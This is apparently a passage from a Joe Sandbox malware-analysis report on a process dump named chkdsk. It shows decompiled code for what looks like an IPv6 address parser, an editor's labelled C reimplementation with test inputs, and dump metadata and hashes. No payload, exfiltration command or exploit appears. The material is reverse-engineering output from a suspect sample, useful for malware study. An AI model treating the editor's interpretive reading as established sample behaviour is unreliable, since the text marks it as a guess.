								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) { // "::" may appear only once
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) { // '.' only in an all-decimal tail, at most three of them
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E023C685D(_t167, 4) != 0) { // decimal digit: extend the current group
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E023C685D(_t167, 0x80) != 0) { // hex letter: extend the group, rule out a dotted-quad tail
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164; // hand back the position of the terminating character
				if(_v12 != 0) {
					if(_v12 != 3) { // a decimal tail must have exactly three dots
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) { // either a "::" marker or all eight groups are present
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E023A8980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105); // copy-like call: move the groups after "::" to the end of the 16-byte address (interpretation)
							_t110 = 8;
							E0239DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8); // fill-like call: zero the groups that "::" stands for (interpretation)
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E023CEE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E023CEE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}
Instruction address column for the listing above (one entry per listing line, detached from the code by extraction; 0x00000000 marks a line with no address of its own). The addresses fall in four regions of the 02370000 dump: 0x023cfcd1-0x023cfe2f, 0x023da3a1-0x023da3b3, 0x023e1fe7-0x023e2018 and 0x023fec67-0x023fedcc.
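The fragment above treats 0x3a (':') and 0x2e ('.') as separators, caps a hexadecimal group at four digits and a decimal part at 0xff, tolerates at most seven separators and a single "::" marker, rejects everything else with 0xc000000d (STATUS_INVALID_PARAMETER), stores the terminating position through _a8, and finishes by moving the groups after the marker to the end of a 16-byte buffer and zero-filling the gap. That is the shape of an IPv6 text-to-address parser with an optional dotted-quad tail. The C below is an added reference reimplementation of that logic written for this page; it is not code recovered from the sample and not Joe Sandbox output, the function and helper names are the editor's, and reading the fragment as an IPv6 parser is an interpretation of the visible constants that the report itself does not state.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define STATUS_SUCCESS           0x00000000u
#define STATUS_INVALID_PARAMETER 0xC000000Du   /* the fragment's 0xc000000d */

static int hexval(char c) {                    /* -1 when c is not a hex digit */
    const char *d = "0123456789abcdefABCDEF", *p = c ? strchr(d, c) : NULL;
    return !p ? -1 : (p - d < 16 ? (int)(p - d) : (int)(p - d) - 6);
}

/* Dotted-quad tail -> two groups: four octets of 1-3 decimal digits, each <= 0xff, three dots. */
static int parse_v4_tail(const char **ps, uint16_t grp[2]) {
    const char *s = *ps; grp[0] = grp[1] = 0;
    for (int i = 0; i < 4; i++) {
        if (i > 0 && *s++ != '.') return 0;
        unsigned v = 0; int ndig = 0;
        while (*s >= '0' && *s <= '9') {
            v = v * 10 + (unsigned)(*s++ - '0');
            if (++ndig > 3) return 0;
        }
        if (ndig == 0 || v > 0xff) return 0;  /* the fragment's "> 0xff" reject */
        grp[i / 2] = (uint16_t)(grp[i / 2] << 8 | v);
    }
    *ps = s;
    return 1;
}

/* IPv6 literal -> eight 16-bit groups (host order); *end gets the first unconsumed char (fragment: _a8). */
uint32_t parse_ipv6_literal(const char *s, uint16_t out[8], const char **end) {
    uint16_t grp[8] = {0};
    int n = 0, compress = -1;           /* groups so far; group index of "::" (fragment: _v28) */
    if (s[0] == ':') {                  /* a leading ':' is only valid as part of "::" */
        if (s[1] != ':') return STATUS_INVALID_PARAMETER;
        compress = 0, s += 2;
    }
    while (hexval(*s) >= 0) {           /* one group per pass */
        if (n >= 8) return STATUS_INVALID_PARAMETER;
        const char *p = s;              /* a decimal run followed by '.' is an IPv4 tail */
        while (*p >= '0' && *p <= '9') p++;
        if (*p == '.') {
            if (n > 6 || !parse_v4_tail(&s, &grp[n])) return STATUS_INVALID_PARAMETER;
            n += 2;
            break;                      /* the tail always ends the address */
        }
        unsigned v = 0; int ndig = 0, h;
        while ((h = hexval(*s)) >= 0) { /* 1-4 hex digits (fragment: "_v16 > 4") */
            v = v << 4 | (unsigned)h;
            if (++ndig > 4) return STATUS_INVALID_PARAMETER;
            s++;
        }
        grp[n++] = (uint16_t)v;
        if (*s != ':') break;           /* any other character terminates the literal */
        s++;
        if (*s == ':') {                /* "::" may appear at most once */
            if (compress >= 0) return STATUS_INVALID_PARAMETER;
            compress = n, s++;
        } else if (hexval(*s) < 0) {    /* a single ':' must be followed by a group */
            return STATUS_INVALID_PARAMETER;
        }
    }
    if (compress < 0) {
        if (n != 8) return STATUS_INVALID_PARAMETER;
    } else {
        if (n > 7) return STATUS_INVALID_PARAMETER;   /* "::" stands for at least one group */
        /* move the groups after "::" to the end, zero the gap: the shape of the fragment's E023A8980/E0239DFC0 calls */
        size_t tail = (size_t)(n - compress);
        memmove(&grp[8 - tail], &grp[compress], tail * sizeof grp[0]);
        memset(&grp[compress], 0, (size_t)(8 - n) * sizeof grp[0]);
    }
    memcpy(out, grp, sizeof grp);
    if (end) *end = s;
    return STATUS_SUCCESS;
}

/* Check helpers: status only, or success + groups as 32 hex chars + the stop character. */
uint32_t ipv6_status(const char *s) {
    uint16_t g[8]; const char *end;
    return parse_ipv6_literal(s, g, &end);
}
int ipv6_matches(const char *s, const char *expected_hex32, char expected_stop) {
    uint16_t g[8]; const char *end; char buf[33];
    if (parse_ipv6_literal(s, g, &end) != STATUS_SUCCESS) return 0;
    for (int i = 0; i < 8; i++) snprintf(buf + 4 * i, 5, "%04x", (unsigned)g[i]);
    return strcmp(buf, expected_hex32) == 0 && *end == expected_stop;
}

int main(void) {
    const char *samples[] = { "2001:db8::1", "::ffff:192.168.0.1", "fe80::1]:443",   /* constructed inputs */
                              "1::2::3", "12345::1", "::1.2.3.256", "1:2:3" };
    for (size_t i = 0; i < sizeof samples / sizeof *samples; i++) {
        uint16_t g[8]; const char *end;
        uint32_t st = parse_ipv6_literal(samples[i], g, &end);
        printf("%-20s ->", samples[i]);
        if (st != STATUS_SUCCESS) { printf(" 0x%08x\n", (unsigned)st); continue; }
        for (int k = 0; k < 8; k++) printf(" %04x", g[k]);
        printf("  stops at \"%s\"\n", end);
    }
    return 0;
}
```

The inputs in main() are constructed for illustration, not strings taken from the dump. Feeding the same strings to the recovered function under a debugger and comparing the returned status, the 16-byte output and the terminator position is the natural way to confirm or refute the IPv6-parser reading of the fragment.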

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
• Associated: 00000008.00000002.1173478360.0000000002370000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000008.00000002.1173596901.0000000002460000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000008.00000002.1173605158.0000000002470000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000008.00000002.1173612960.0000000002474000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000008.00000002.1173630096.0000000002477000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000008.00000002.1173640722.0000000002480000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000008.00000002.1173687030.00000000024E0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2370000_chkdsk.jbxd
                                          Similarity
                                          • API ID: __fassign
                                          • String ID:
                                          • API String ID: 3965848254-0
                                          • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                          • Instruction ID: a67952ede27e6ca1850c6af3e676258e954f18e73ab40bb269cdcae2263634d8
                                          • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                          • Instruction Fuzzy Hash: 51918C71D0020AEFDF24DFA8C8457AEB7B6EB45709F30846FD405A6692E7309E41CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%